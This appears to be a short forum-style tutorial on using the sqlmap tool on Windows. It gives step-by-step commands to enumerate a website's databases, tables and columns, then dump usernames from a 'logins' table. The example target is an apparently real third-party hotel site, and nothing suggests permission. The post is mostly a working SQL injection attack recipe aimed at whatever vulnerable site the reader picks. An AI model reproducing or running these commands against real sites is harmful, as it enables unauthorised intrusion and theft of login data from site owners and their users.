How To Use SQLMap

This is for windows. if you have windows 7/Vista you just need download Sqlmap Click Here To Download

If, you have Windows XP you have to download Python here:Click Here To Download [DOWNLOAD VERSION 2.7.6]

1- Extract .rar file to C:

2- Open your cmd and type: cd\


3-Now, type: cd sqlmap\


4- Type: sqlmap.py -u http://site.com/index.php?id=1 --dbs
In "http://site.com/index.php?id=1" you type the site you want, but site have to be vulnerable. I will use www.parkhotel.pt/nm_quemsomos.php?id=144
It will give you the dbs of site "Database"

5- Now, normally will appeare in dbs "information_schema" that DB don't have anything don't try dump that.. I have 2 dbs, "information_schema" and "parkhotel" i will type sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel --tables \\Explain:"-D parkhotel" why i don't put --dbs, because im not trying to find dbs "--dbs is to find the dbs", and -D is a sign i already have DB.


6- I already have the tables .. like you see down here .. Now type this: sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel -T logins --columns (i choose logins table) this code will give you the collumns of table


7- Finally i will dump the collumns with command: sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel -T logins -C username --dump


If you need help with something, comment here